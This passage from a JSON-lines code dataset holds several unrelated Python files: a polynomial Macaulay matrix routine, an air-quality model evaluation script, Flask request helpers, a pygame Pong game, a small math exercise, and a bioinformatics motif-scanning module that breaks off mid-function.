#flat_polys.append(array[np.vstack(permutations.values())])\n degreeNeeded = degree - poly.degree\n mons = mons_ordered(dim,degreeNeeded)\n mons = np.pad(mons, (0,1), 'constant', constant_values = i)\n i += 1\n flat_polys.append(array)\n for mon in mons[1:-1]:\n result = np.copy(array)\n for i in range(dim):\n if mon[i] != 0:\n\n mult = [0]*dim\n mult[i] = mon[i]\n result = np.sum(result[permutations[tuple(mult)]], axis = 0)\n flat_polys.append(result)\n #print(flat_polys)\n matrix = np.vstack(flat_polys)\n if matrix_shape_stuff[0] > matrix.shape[0]: #The matrix isn't tall enough, these can't all be pivot columns.\n raise MacaulayError(\"HIGHEST NOT FULL RANK. TRY HIGHER DEGREE\")\n matrix = row_swap_matrix(matrix)\n #print(matrix)\n return matrix, matrix_terms, cuts\n","sub_path":"numalgsolve/MacaulayReduce.py","file_name":"MacaulayReduce.py","file_ext":"py","file_size_in_byte":17132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"129488860","text":"import numpy as np\r\nfrom sklearn import preprocessing\r\nimport math\r\nfrom sklearn import metrics\r\nfrom tensorflow.keras.models import load_model\r\n\r\ndata = np.load(\"D:/project/data/BTH/dataset_BTH.npy\") #(61, 363, 43)\r\ndataset_all = data.reshape((-1,43)) #(22143, 43)\r\n\r\nvar_dict = {'PM2.5_Bias':0, 'PM10_Bias':1, 'NO2_Bias':2, 'SO2_Bias':3, 'O3_Bias':4, 'CO_Bias':5, 'PM2.5_Obs':6, 'PM10_Obs':7, 'NO2_Obs':8, 'SO2_Obs':9, 'O3_Obs':10, 'CO_Obs':11, 'PM2.5_Sim':12, 'PM10_Sim':13, 'NO2_Sim':14, 'SO2_Sim':15, 'O3_Sim':16, 'CO_Sim':17, 'RH_Bias':18, 'TEM_Bias':19, 'WSPD_Bias':20, 'WDIR_Bias':21, 'PRE_Bias':22, 'RH_Obs':23, 'TEM_Obs':24, 'WSPD_Obs':25, 'WDIR_Obs':26, 'PRE_Obs':27, 'PBLH_Sim':28, 'SOLRAD_Sim':29, 'RH_Sim':30, 'TEM_Sim':31, 'WSPD_Sim':32, 'WDIR_Sim':33, 'PRE_Sim':34, 'PM2.5_Bias_ystd':35, 'NO2_Bias_ystd':36, 'RH_Bias_ystd':37, 'O3_Bias_ystd':38, 'SO2_Bias_ystd':39, 'WSPD_Bias_ystd':40, 'NO2_Obs_ystd':41, 'O3_Obs_ystd':42}\r\n\r\nvar_sele = ['PM2.5_Sim','PM2.5_Bias_ystd','NO2_Bias','SO2_Bias','O3_Bias','NO2_Obs','SO2_Obs','O3_Obs','RH_Bias','TEM_Bias','WDIR_Bias','WSPD_Bias','PRE_Bias','RH_Obs','TEM_Obs','WSPD_Obs','PRE_Obs','PBLH_Sim','SOLRAD_Sim']\r\n#standardization: scaler of dataset_all\r\nY_all = dataset_all[:,0].reshape((dataset_all.shape[0],1))\r\nX_all = np.zeros((len(dataset_all),len(var_sele)))\r\ni = 0\r\nfor var in var_sele:\r\n X_all[:,i] = dataset_all[:,var_dict.get(var)]\r\n i += 1\r\nscaler1 = preprocessing.StandardScaler().fit(X_all)\r\nscaler2 = preprocessing.StandardScaler().fit(Y_all)\r\nX_all = scaler1.transform(X_all)\r\nY_all = scaler2.transform(Y_all) #(15972, 1)\r\n\r\n#prepare x & y dataset\r\ndef get_xy_dataset(input_dataset):\r\n global scaler1, scaler2 \r\n Y = input_dataset[:,0] #'PM2.5_Bias'\r\n X = np.zeros((len(input_dataset),len(var_sele)))\r\n i = 0\r\n for var in var_sele:\r\n X[:,i] = input_dataset[:,var_dict.get(var)]\r\n i += 1\r\n X = scaler1.transform(X) #标准化\r\n Y = Y.reshape((Y.shape[0],1))\r\n Y = scaler2.transform(Y) #标准化\r\n return X, Y\r\n\r\ndataset_X , dataset_y = get_xy_dataset(dataset_all)\r\n\r\n#load model trained by BTH dataset\r\nmodel = load_model(\"D:/project/data/BTH/DOMAIN_TRANS/DNN_YRD_1.h5\")\r\n\r\n#RMSE\r\ndef cal_rmse(xtest, ytest = None, info = ''):\r\n if ytest is None:\r\n RMSE = math.sqrt(metrics.mean_squared_error(xtest[:,var_dict.get('PM2.5_Obs')], xtest[:,var_dict.get('PM2.5_Sim')]))\r\n else:\r\n y_pred = model.predict(xtest)\r\n y_pred = scaler2.inverse_transform(y_pred) #invers\r\n PM25_revised = ytest[:,var_dict.get('PM2.5_Sim')] - y_pred.reshape(len(xtest),)\r\n RMSE = math.sqrt(metrics.mean_squared_error(ytest[:,var_dict.get('PM2.5_Obs')], PM25_revised))\r\n print(info + ' RMSE: %.3f' % RMSE)\r\n\r\ncal_rmse(dataset_all, info = 'all year')\r\ncal_rmse(dataset_X, dataset_all, 'all year revised')\r\n\r\n#R2\r\ndef cal_R2(xtest, ytest = None, info = ''):\r\n if ytest is None:\r\n u = np.concatenate((xtest[:,var_dict.get('PM2.5_Obs')], xtest[:,var_dict.get('PM2.5_Sim')])).reshape((2,-1))\r\n R2 = np.corrcoef(u)[0,1] ** 2\r\n else:\r\n y_pred = model.predict(xtest)\r\n y_pred = scaler2.inverse_transform(y_pred)\r\n PM25_revised = ytest[:,var_dict.get('PM2.5_Sim')] - y_pred.reshape(len(xtest),)\r\n v = np.concatenate((ytest[:,var_dict.get('PM2.5_Obs')], PM25_revised)).reshape((2,-1))\r\n R2 = np.corrcoef(v)[0,1] ** 2\r\n print(info + ' R2: %.3f' % R2)\r\n\r\ncal_R2(dataset_all, info = 'all year')\r\ncal_R2(dataset_X, dataset_all, 'all year revised')\r\n\r\n#NMB\r\ndef cal_NMB(xtest, ytest = None, info = ''):\r\n if ytest is None:\r\n NMB = np.sum(xtest[:,var_dict.get('PM2.5_Sim')] - xtest[:,var_dict.get('PM2.5_Obs')]) / np.sum(xtest[:,var_dict.get('PM2.5_Obs')])\r\n else:\r\n y_pred = model.predict(xtest)\r\n y_pred = scaler2.inverse_transform(y_pred)\r\n #bias=sim-obs,PM25_revised=sim-bias\r\n PM25_revised = ytest[:,var_dict.get('PM2.5_Sim')] - y_pred.reshape(len(xtest),)\r\n NMB = np.sum(PM25_revised - ytest[:,var_dict.get('PM2.5_Obs')]) / np.sum(ytest[:,var_dict.get('PM2.5_Obs')])\r\n print(info + ' NMB: %.3f' % NMB)\r\n\r\ncal_NMB(dataset_all, info = 'all year')\r\ncal_NMB(dataset_X, dataset_all, 'all year revised')\r\n\r\n","sub_path":"BTH/DOMAIN_TRANS/domain_trans_2.py","file_name":"domain_trans_2.py","file_ext":"py","file_size_in_byte":4233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"71301997","text":"from time import time\nimport sys\nimport logging\nfrom functools import wraps\nfrom flask import Response\nimport rapidjson\nfrom src.business.biz.CallBiz import CallBiz\nfrom src.business.biz.TelephoneBillBiz import TelephoneBillBiz\n\n\nlogging.basicConfig(stream=sys.stdout, level=logging.INFO)\n\n\ndef api_data_return():\n def intern_dec(func):\n @wraps(func)\n def wrapper_decorator(*args, **kwargs):\n start = time()\n data = {\n 'status': 405,\n 'success': False,\n 'execution_time': 0,\n 'message': 'Method Not Allowed',\n 'result': None\n }\n data = func(data)\n data['execution_time'] = time() - start\n return format_json_response(data)\n return wrapper_decorator\n return intern_dec\n\n\ndef format_json_response(data):\n return Response(\n rapidjson.dumps(data),\n status=data['status'],\n mimetype='application/json'\n )\n\n\ndef call_request(data, request, type=None):\n if request.method == 'POST':\n if request.is_json:\n try:\n req_data = request.get_json()\n if req_data:\n # In case we are calling api start | end endpoints\n if type:\n req_data['type'] = type\n data = CallBiz(req_data, data).save()\n except Exception as e:\n logging.info(e)\n data['status'] = 406\n data['message'] = 'Not Acceptable : Content type must be application/json'\n else:\n data['status'] = 406\n data['message'] = 'Not Acceptable : Content type must be application/json'\n return data\n\n\ndef telephone_bill_request(data, request):\n if request.method in ['GET', 'POST']:\n if request.is_json:\n try:\n req_data = request.get_json()\n if req_data:\n data = TelephoneBillBiz(req_data, data).save()\n except Exception as e:\n logging.info(e)\n data['status'] = 406\n data['message'] = 'Not Acceptable : Content type must be application/json'\n else:\n data['status'] = 406\n data['message'] = 'Not Acceptable : Content type must be application/json'\n return data\n","sub_path":"src/controllers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"318472970","text":"import os, sys, pygame\nfrom random import randint\n\n\nclass Pad(pygame.sprite.Sprite):\n def __init__(self, pos=(0, 0)):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface((12, 30)).convert()\n self.image.fill((255, 255, 255))\n self.rect = self.image.get_rect(center=pos)\n self.max_speed = 5\n self.speed = 0\n\n def move_up(self):\n self.speed = self.max_speed * -1\n\n def move_down(self):\n self.speed = self.max_speed * 1\n\n def stop(self):\n self.speed = 0\n\n def update(self):\n self.rect.move_ip(0, self.speed)\n\n\nclass Ball(pygame.sprite.Sprite):\n def __init__(self, pos=(0, 0)):\n pygame.sprite.Sprite.__init__(self)\n self.pos = pos\n self.image = pygame.Surface((10, 10)).convert()\n self.image.fill((255, 255, 255))\n self.rect = self.image.get_rect(center=self.pos)\n self.speed_x = 0\n self.speed_y = 0\n\n def change_y(self):\n self.speed_y *= -1\n\n def change_x(self):\n self.speed_x *= -1\n\n def start(self, speed_x, speed_y):\n self.speed_x = speed_x\n self.speed_y = speed_y\n\n def stop(self):\n self.speed_x = 0\n self.speed_y = 0\n\n def reset(self):\n self.rect = self.image.get_rect(center=self.pos)\n\n def update(self):\n self.rect.move_ip(self.speed_x, self.speed_y)\n\n\nclass Score(pygame.sprite.Sprite):\n def __init__(self, font, pos=(0, 0)):\n pygame.sprite.Sprite.__init__(self)\n self.font = font\n self.pos = pos\n self.score = 0\n self.image = self.font.render(str(self.score), 0, (255, 255, 255))\n self.rect = self.image.get_rect(center=self.pos)\n\n def score_up(self):\n self.score += 1\n\n def update(self):\n self.image = self.font.render(str(self.score), 0, (255, 255, 255))\n self.rect = self.image.get_rect(center=self.pos)\n\n\ndef main():\n pygame.init()\n\n size = width, height = 800, 600\n screen = pygame.display.set_mode(size)\n pygame.display.set_caption('Pong Pygame')\n\n try:\n filename = os.path.join(\n os.path.dirname(__file__),\n 'assets',\n 'graphics',\n 'background.png')\n background = pygame.image.load(filename)\n background = background.convert()\n except pygame.error as e:\n print ('Cannot load image: ', filename)\n raise SystemExit(str(e))\n\n pad_left = Pad((width/6, height/4))\n pad_right = Pad((5*width/6, 3*height/4))\n ball = Ball((width/2, height/2))\n\n if not pygame.font:\n raise SystemExit('Pygame does not support fonts')\n\n try:\n filename = os.path.join(\n os.path.dirname(__file__),\n 'assets',\n 'fonts',\n 'wendy.ttf')\n font = pygame.font.Font(filename, 90)\n except pygame.error as e:\n print ('Cannot load font: ', filename)\n raise SystemExit(str(e))\n\n left_score = Score(font, (width/3, height/8))\n right_score = Score(font, (2*width/3, height/8))\n\n sprites = pygame.sprite.Group(\n pad_left, pad_right, ball, left_score, right_score)\n\n clock = pygame.time.Clock()\n fps = 100\n\n pygame.key.set_repeat(1, 1000/fps)\n\n top = pygame.Rect(0, 0, width, 5)\n bottom = pygame.Rect(0, height-5, width, 5)\n left = pygame.Rect(0, 0, 5, height)\n right = pygame.Rect(width-5, 0, 5, height)\n\n while 1:\n clock.tick(fps)\n\n pad_left.stop()\n pad_right.stop()\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n return\n elif event.type == pygame.KEYDOWN and event.key == pygame.K_w:\n pad_left.move_up()\n elif event.type == pygame.KEYDOWN and event.key == pygame.K_s:\n pad_left.move_down()\n elif event.type == pygame.KEYDOWN and event.key == pygame.K_UP:\n pad_right.move_up()\n elif event.type == pygame.KEYDOWN and event.key == pygame.K_DOWN:\n pad_right.move_down()\n elif event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:\n ball.start(randint(1, 3), randint(1, 3))\n\n if ball.rect.colliderect(top) or ball.rect.colliderect(bottom):\n ball.change_y()\n elif (ball.rect.colliderect(pad_left.rect) or\n ball.rect.colliderect(pad_right.rect)):\n ball.change_x()\n\n screen_rect = screen.get_rect().inflate(0, -10)\n pad_left.rect.clamp_ip(screen_rect)\n pad_right.rect.clamp_ip(screen_rect)\n\n if ball.rect.colliderect(left):\n right_score.score_up()\n ball.reset()\n ball.stop()\n elif ball.rect.colliderect(right):\n left_score.score_up()\n ball.reset()\n ball.stop()\n\n sprites.update()\n\n screen.blit(background, (0, 0))\n sprites.draw(screen)\n pygame.display.flip()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"pong-pygame/pong/orig_sou.py","file_name":"orig_sou.py","file_ext":"py","file_size_in_byte":5013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"152374063","text":"import math\nnum_01 = int(input('Digite o número: '))\n\nif num_01 >0:\n num_Q = num_01 ** 2\n print(f'{num_Q}')\n num_R = math.sqrt(num_01)\n print({num_R})\n\nelse:\n print(f'Número invalido!')","sub_path":"Exercicios/Seção 05/04_Exercicio.py","file_name":"04_Exercicio.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"319887876","text":"import os\nimport bs4\nimport numpy\nimport scipy\nimport pandas\nimport math\nimport re\nimport datetime\nimport collections\nimport statsmodels.sandbox.stats.multicomp\nfrom Bio.motifs._pwm import calculate as biopython_motif_calculate\n\nfrom pgtools import toolbox\n\nBACKGROUND_FREQUENCY_FILENAME = toolbox.home_path('model_data/background_nucleotide_frequencies.csv')\n\n\ndef get_background_frequencies(genome_build, background_frequency_fname=BACKGROUND_FREQUENCY_FILENAME):\n updated = False\n\n print('Loading background nucleotide frequencies from {}'.format(background_frequency_fname))\n try:\n background_models = pandas.read_csv(background_frequency_fname, index_col=0).to_dict('list')\n except (IOError, OSError):\n background_models = {}\n print('File not found.'.format(background_frequency_fname))\n else:\n print('Background frequencies loaded.')\n\n if genome_build in background_models:\n print('Found background model for genome {}: {}'.format(genome_build, background_models[genome_build]))\n else:\n print('\\tBackground frequencies for genome build {} not found. Computing now...'.format(\n genome_build))\n genome = genomic_tools.Genome(genome_build)\n background_models[genome_build] = genome.compute_nucleotide_frequencies()\n updated = True\n \n if updated:\n print('Saving updated background nucleotide frequencies to {}'.format(background_frequency_fname))\n pandas.DataFrame(background_models).to_csv(background_frequency_fname)\n \n return background_models[genome_build]\n\n \ndef generate_random_sequence(size, nucleotide_frequencies=[0.25]*4, random_seed=None):\n \"\"\"\n Returns a string of random nucleotides of length :param:`size` drawn from the distribution\n specified by :param:`nucleotide_frequencies`. \n \"\"\"\n numpy.random.seed(random_seed)\n return ''.join(numpy.random.choice(['A', 'C', 'G', 'T'], size=size, p=nucleotide_frequencies))\n\n###############################################################################\n## Motif classes \n###############################################################################\n\n# ToDo: add in k-nucleotide attributes and conversion methods.\nclass Motif():\n \"\"\"\n Parent class for motif instances.\n \"\"\"\n CHARS_TO_REMOVE = '[|]ACGT'\n\n def __repr__(self):\n return self.data.__repr__()\n \n def __str__(self):\n return self.data.__str__()\n \n @property\n def motif_width(self):\n return self.data.shape[1]\n \n @classmethod\n def _parse_horizontal_motif(cls, matrix_string_list, dtype):\n assert len(matrix_string_list) == 4\n\n # Peek at the first line to detect number of columns\n split_line = re.split(toolbox.WHITESPACE, toolbox.replace_multi(matrix_string_list[0], cls.CHARS_TO_REMOVE, '').strip())\n num_columns = len(split_line)\n\n matrix = numpy.zeros((4, num_columns), dtype=dtype)\n for matrix_row, line in enumerate(matrix_string_list):\n split_line = re.split(toolbox.WHITESPACE, toolbox.replace_multi(line, cls.CHARS_TO_REMOVE, '').strip())\n assert len(split_line) == num_columns, 'Found {} columns on row {}, expected {}'.format(len(split_line), matrix_row, num_columns)\n matrix[matrix_row, :] = numpy.array([dtype(element) for element in split_line])\n\n return matrix\n \n @classmethod\n def _parse_vertical_motif(cls, matrix_string_list, dtype):\n num_rows = len(matrix_string_list)\n\n matrix = numpy.zeros((4, num_rows), dtype=dtype)\n for matrix_row, line in enumerate(matrix_string_list):\n if line != '':\n split_line = re.split(toolbox.WHITESPACE, toolbox.replace_multi(line, cls.CHARS_TO_REMOVE, '').strip())\n assert len(split_line) == 4, 'Found {} columns on row {}, expected 4'.format(len(split_line), matrix_row)\n matrix[:, matrix_row] = numpy.array([dtype(element) for element in split_line])\n return matrix \n \n @staticmethod\n def _read_multi_motif_file(multi_motif_filename):\n \"\"\"\n Reads the contents of :param:`motif_filename` that contains motif matrices separated by FASTA-style\n headers (lines starting with '>\") and returns a dictionary of lists of lines keyed by header contents.\n \n These lines can be then passed to parsing functions to convert them to motif matrices.\n \"\"\"\n lines_dict = collections.OrderedDict()\n with open(multi_motif_filename, 'rt') as multi_motif_file:\n these_lines = []\n \n for line in multi_motif_file:\n line = line.strip()\n if line:\n if line.startswith('>'): # header line\n if these_lines:\n assert header not in lines_dict, 'Encountered duplicate entry for motif {} !'.format(header) \n lines_dict[header] = these_lines\n these_lines = []\n header = line[1:].strip()\n else:\n these_lines.append(line.strip())\n \n lines_dict[header] = these_lines\n \n return lines_dict\n \n def rev_complement(self):\n \"\"\"\n Retruns the reverse complement of a motif (either PWM or PFM) by reversing the order and transposing A/T and C/G.\n :param motif_matrix: A 2D matrix with nucleotides in rows in alpha order A,C,G,T and positions in columns\n :return: A 2D matrix with nucleotides in rows in alpha order A,C,G,T and positions in columns\n \"\"\"\n return self.data[(3, 2, 1, 0), ::-1]\n \n \nclass Pcm(Motif):\n def __init__(self, pcm_matrix):\n \"\"\"\n \"\"\"\n assert pcm_matrix.dtype == int, 'Received invalid dtype {} for pcm_matrix, was expecting int'.format(pcm_matrix.dtype)\n pcm_matrix = numpy.array(pcm_matrix, dtype=int)\n self.data = pcm_matrix\n \n @classmethod\n def from_strings(cls, pcm_strings, orientation='horiz'):\n if orientation == 'horiz':\n return cls(cls._parse_horizontal_motif(pcm_strings, dtype=int))\n elif orientation == 'vert':\n return cls(cls._parse_vertical_motif(pcm_strings, dtype=int)) \n\n @classmethod\n def from_file(cls, pcm_filename, orientation='horiz'):\n with open(pcm_filename, 'rt') as in_file:\n pcm_strings = in_file.readlines()\n if pcm_strings[0].startswith('>'):\n pcm_strings = pcm_strings[1:]\n\n return cls.from_strings(pcm_strings=pcm_strings, orientation=orientation) \n \n def to_pfm(self, pseudocount=0):\n \"\"\"\n Converts a position count matrix (PCM) to position frequency matrix (PFM) by converting counts to frequencies\n (assume nucleotides in rows in alpha order A,C,G,T,\n transpose the input if nucleotides in columns).\n Adds to each entry before calculating.\n \"\"\"\n return Pfm(((self.data + pseudocount) / self.data.sum(axis=0)).astype(float))\n \n def to_pwm(self, background_model=[0.25] * 4, pseudocount=0):\n \"\"\"\n Converts a PCM to PWM by converting counts to frequencies (assume nucleotides in rows in alpha order A,C,G,T,\n transpose the input if nucleotides in columns), then calculating the log2 ratio between the matrix frequency and\n the background frequency ( should be given as a sequence of four frequencies in A,C,G,T order.)\n\n Adds .\n \"\"\"\n return Pwm(numpy.log2(numpy.apply_along_axis(numpy.divide, 0, self.to_pfm(pseudocount).data, background_model)))\n \n \nclass Pfm(Motif):\n def __init__(self, pfm_matrix):\n \"\"\"\n \"\"\"\n pfm_matrix = numpy.array(pfm_matrix)\n assert pfm_matrix.dtype == float, 'Recieved invalid dtype {} for pfm_matrix, was expecting float'.format(pfm_matrix.dtype)\n self.data = pfm_matrix\n\n @classmethod\n def from_homer_strings(cls, homer_strings):\n header_line = homer_strings[0] # currently unused\n return cls._parse_vertical_motif(homer_strings[1:], dtype=float)\n \n @classmethod\n def from_strings(cls, pfm_strings, orientation='horiz'):\n if orientation == 'horiz':\n return cls(cls._parse_horizontal_motif(pfm_strings, dtype=float))\n elif orientation == 'vert':\n return cls(cls._parse_vertical_motif(pfm_strings, dtype=float)) \n\n @classmethod\n def from_file(cls, pfm_filename, orientation='horiz'):\n with open(pfm_filename, 'rt') as in_file:\n pfm_strings = in_file.readlines()\n if pfm_strings[0].startswith('>'):\n pfm_strings = pfm_strings[1:]\n\n return cls.from_strings(pfm_strings=pfm_strings, orientation=orientation) \n \n def to_pcm(self, total_count=1000, pseudocount=0):\n \"\"\"\n Converts a position frequency matrix (PFM) to a theoretical position count matrix (PCM)\n by multiplying each frequency by the specified :param:`total_count`\n\n (assumes nucleotides in rows in alpha order A,C,G,T,\n transpose the input if nucleotides in columns).\n\n Adds to each entry before calculating.\n \"\"\"\n return Pcm((self.data * total_count).astype(int) + pseudocount) \n \n def to_pwm(self, background=[0.25] * 4, pseudofrequency=0):\n \"\"\"\n Converts a PFM to PWM by converting frequencies to weights (assume nucleotides in rows in alpha order A,C,G,T,\n transpose the input if nucleotides in columns), then calculating the log2 ratio between the matrix frequency and\n the background frequency ( should be given as a sequence of four weights in A,C,G,T order.)\n\n Adds .\n \"\"\"\n return Pwm(numpy.log2(numpy.apply_along_axis(numpy.divide, 0, self.data + pseudofrequency, background)))\n\n def export_to_homer(self, motif_name, motif_filename, llr_threshold=0):\n with open(motif_filename, 'wt') as motif_file:\n motif_file.write('>{}\\t{}\\t{}\\n'.format(''.join(consensus_sequence(self.data)), motif_name, llr_threshold))\n for col in range(self.motif_width):\n motif_file.write('{}\\n'.format('\\t'.join([str(x) for x in self.data[:, col]])))\n \n def entropy_by_pos(self):\n entropy_weights = numpy.zeros(self.motif_width)\n for pos in range(self.motif_width):\n for nuc in range(4):\n entropy_weights[pos] -= self.data[nuc, pos] * math.log(self.data[nuc, pos], 2)\n return entropy_weights\n\n \n \nclass Pwm(Motif):\n def __init__(self, pwm_matrix):\n \"\"\"\n \"\"\"\n pwm_matrix = numpy.array(pwm_matrix)\n assert pwm_matrix.dtype == float, 'Recieved invalid dtype {} for pfm_matrix, was expecting float'.format(pfm_matrix.dtype)\n self.data = pwm_matrix\n \n def export_pwm_to_meme(self, motif_name, fname, background_model, meme_version=4, strands='+'):\n \"\"\"\n Placeholder stub for export to meme\n \"\"\"\n with open(fname, 'wt') as out_file:\n out_file.write('MEME version {}\\n'.format(meme_version))\n out_file.write('ALPHABET = ACGT\\n')\n out_file.write('STRANDS: +\\n')\n out_file.write('Background letter frequencies\\n')\n out_file.write('A {} C {} G {} T {}\\n'.format(*background_model))\n out_file.write('MOTIF {}\\n'.format(motif_name))\n pass\n \n def scan_sequence(self, sequence):\n return scan_pwm(sequence, self)\n \n\ndef load_jaspar_motifs(jaspar_filename):\n \"\"\"\n Assuming :param:`jaspar_filename` contains a sequence of jaspar motifs, \n returns the contents of as a dictionary of PCMs. \n \"\"\"\n return {re.split(toolbox.WHITESPACE, key)[1]:Pcm.from_strings(lines) for key, lines in Pcm._read_multi_motif_file(jaspar_filename).items()}\n \n \ndef load_homer_motifs(homer_filename):\n \"\"\"\n Loads the motifs found in :param:`homer_filename` and returns them as a \n dictionary of Pfm objects keyed by the order in which they appear.\n \"\"\"\n \n return {i:Pfm.from_homer_strings(lines) for i, lines in enumerate(Pfm._read_multi_motif_file(homer_filename).values())}\n\n \ndef load_vert_motifs(motif_filename):\n \"\"\"\n Loads the vertical PFMs found in :param:`motif_filename` and returns them as a \n dictionary of Pfm objects keyed by header.\n \"\"\"\n return {header:Pfm.from_strings(lines, orientation='vert') for header, lines in Pfm._read_multi_motif_file(motif_filename).items()} \n \n \n ##############################################################################\n ## Other tools\n ##############################################################################\n \ndef compute_background_distribution(seq, normalize=True):\n \"\"\"\n Computes the background nucleotide distribution of a sequence (essentially a 1-position PCM)\n Returns a PFM ( if you want a PFM)\n \"\"\"\n background_freq = toolbox.freq(seq)\n background_pcm = numpy.array(\n [background_freq[k] for k in sorted(background_freq.keys()) if k in ('A', 'C', 'G', 'T')])\n if normalize:\n return pcm_to_pfm(background_pcm)\n else:\n return background_pcm\n\n\ndef exclusive_joint(prob_a, prob_b):\n \"\"\"\n Returns the joint probability of (A and not B) or (B and not A)\n \"\"\"\n return prob_a + prob_b - prob_a * prob_b\n\n\ndef binding_probabilities(energies, mu=0):\n \"\"\"\n Returns a vector of binding probabilities given a single strand vector of binding energy values (such as generated by a PWM)\n and a scalar that adjusts for the free concentration of ligand (theoretically equal to ln[TF]).\n :param energies:\n :param mu:\n :return:\n \"\"\"\n return 1 / (1 + numpy.exp(-energies - mu))\n\n \ndef energy_to_prob(energy_neg, energy_pos, mu):\n return exclusive_joint(binding_probabilities(energy_pos, mu), binding_probabilities(energy_neg, mu))\n\n\n\ndef consensus_sequence(horizontal_motif_matrix):\n \"\"\"\n Given either a PWM or PFM in horizontal format, returns a string containing the consensus\n sequence of that motif (best-matching nucleotide at each position)\n \"\"\"\n nucs = numpy.array(['A', 'C', 'G', 'T'])\n return nucs[numpy.argmax(horizontal_motif_matrix, axis=0)]\n\n\ndef scan_pwm(seq, pwm, score_offset=0, at_motif_midpoint=False, method='Bio'):\n \"\"\"\n Given a sequence and a Pwm object,\n compute the single-stranded binding energy of the subsequence starting at each\n position. Scores are placed at the starting point of the motif subsequence unless is specified, in\n which case they are shifted by the given amount toward the end of the motif.\n \"\"\"\n if at_motif_midpoint:\n motif_length = pwm.data.shape[1]\n motif_midpoint = motif_length / 2 - 1\n score_offset += motif_midpoint\n if method == 'Bio':\n scan = _scan_pwm_biopython(seq, pwm.data, score_offset=score_offset)\n else:\n scan = _scan_pwm_native_python(seq, pwm.data, score_offset=score_offset)\n assert len(scan) == len(seq) # check that we didn't screw this up\n return scan\n\n\ndef _scan_pwm_biopython(seq, pwm, score_offset=0):\n \"\"\"\n Biopython expects nucleotides in columns, but since I like to have them in rows, this function assumes rows\n and transposes the PWM that's passed to Biopython.\n\n Scores are placed at the starting point of the motif subsequence unless is specified, in\n which case they are shifted by the given amount toward the end of the motif.\n :param seq:\n :param pwm:\n :return:\n \"\"\"\n motif_length = pwm.shape[1]\n score_offset = int(score_offset)\n if type(seq) == numpy.ndarray:\n scan = biopython_motif_calculate(''.join(seq), pwm.T)\n else:\n scan = biopython_motif_calculate(seq, pwm.T)\n return numpy.concatenate((numpy.zeros(score_offset), scan, numpy.zeros(motif_length - score_offset - 1)))\n\n\ndef _scan_pwm_native_python(seq, pwm, score_offset=0, N_score=-4.64):\n \"\"\"\n Given a sequence and a PWM in log-odds format, compute the single-stranded binding energy of the subsequence starting at each\n position. Scores are placed at the starting point of the motif subsequence unless is specified, in\n which case they are shifted by the given amount toward the end of the motif.\n\n Any 'N's in the sequence will be assigned the value of . Default is roughly equivalent to a 1/100\n probability versus a background of 1/4\n \"\"\"\n nuc_dict = {'A': 0, 'C': 1, 'G': 2, 'T': 3}\n score = numpy.zeros(len(seq))\n for start_pos in range(len(seq) - pwm.shape[1]):\n for offset in range(pwm.shape[1]):\n if seq[start_pos + offset] == 'N':\n score[start_pos + score_offset] += N_score\n else:\n score[start_pos + score_offset] += pwm[nuc_dict[seq[start_pos + offset]]][offset]\n return score\n\n\n\ndef find_motifs_empirical(genome, pwm, lr_threshold=0, fdr=0.05, p_val_threshold=None):\n \"\"\"\n An early attempt at motif site thresholding by empirical p-value. Not recommended.\n \"\"\"\n start_time = datetime.datetime.now()\n # number the contigs\n contig_names = {contig_number:contig_name for contig_number, contig_name in enumerate(sorted(genome.contig_names))}\n contig_numbers = {contig_name:contig_number for contig_number, contig_name in enumerate(sorted(genome.contig_names))}\n\n rev_pwm = motif_rev_complement(pwm) # compute the reverse complement of the motif\n\n # build genome wide arrays: contig identity, motif score, and start location\n contig_ids_by_contig = []\n motif_scores_by_contig = []\n start_locations_by_contig = []\n strands_by_contig = []\n print('Scoring genome sequence ...')\n for contig_name in toolbox.numerical_string_sort(genome.contig_lengths.keys()):\n contig_length = genome.contig_lengths[contig_name]\n print('\\tScoring contig {} ...'.format(contig_name))\n for strand in (True, False): \n contig_ids_by_contig.append(numpy.full(shape=contig_length, fill_value=contig_numbers[contig_name], dtype=numpy.int))\n motif_scores_by_contig.append(scan_pwm(genome.get_dna_sequence(contig_name), (rev_pwm, pwm)[strand], at_motif_midpoint=False))\n start_locations_by_contig.append(numpy.arange(contig_length))\n strands_by_contig.append(numpy.full(shape=contig_length, fill_value=strand, dtype=numpy.bool))\n \n print('Concatenating results ...')\n contig_ids = numpy.concatenate(contig_ids_by_contig)\n del(contig_ids_by_contig)\n motif_scores = numpy.concatenate(motif_scores_by_contig)\n del(motif_scores_by_contig)\n start_locations = numpy.concatenate(start_locations_by_contig)\n del(start_locations_by_contig)\n strands = numpy.concatenate(strands_by_contig)\n del(strands_by_contig)\n\n # remove any loci with NaN scores\n print('Filtering out invalid loci ...')\n nonnan_loci = numpy.nonzero(~numpy.isnan(motif_scores))[0]\n contig_ids = contig_ids[nonnan_loci]\n motif_scores = motif_scores[nonnan_loci]\n start_locations = start_locations[nonnan_loci]\n strands = strands[nonnan_loci]\n print('\\tRemoved {} out of {} loci'.format((genome.size*2) - len(nonnan_loci), (genome.size*2)))\n del(nonnan_loci)\n\n # Fit a normal distribution to the whole dataset prior to filtering\n print('Fitting normal distribution ...')\n data_size = len(motif_scores)\n data_mean, data_std = motif_scores.mean(), motif_scores.std()\n motif_score_distribution = scipy.stats.norm(loc=data_mean, scale=data_std)\n print('\\tMotif scores have mean {:>0.2}, SD {:>0.2}'.format(data_mean, data_std))\n\n # threshold by likelihood ratio\n if lr_threshold is not None:\n print('Filtering by likelihood ratio > {}'.format(lr_threshold))\n candidate_mask = motif_scores > lr_threshold\n motif_scores = motif_scores[candidate_mask]\n contig_ids = contig_ids[candidate_mask]\n start_locations = start_locations[candidate_mask]\n strands = strands[candidate_mask]\n print('\\tFound {} loci out of {}.'.format(len(motif_scores), data_size))\n\n print('Computing p-values ...')\n # 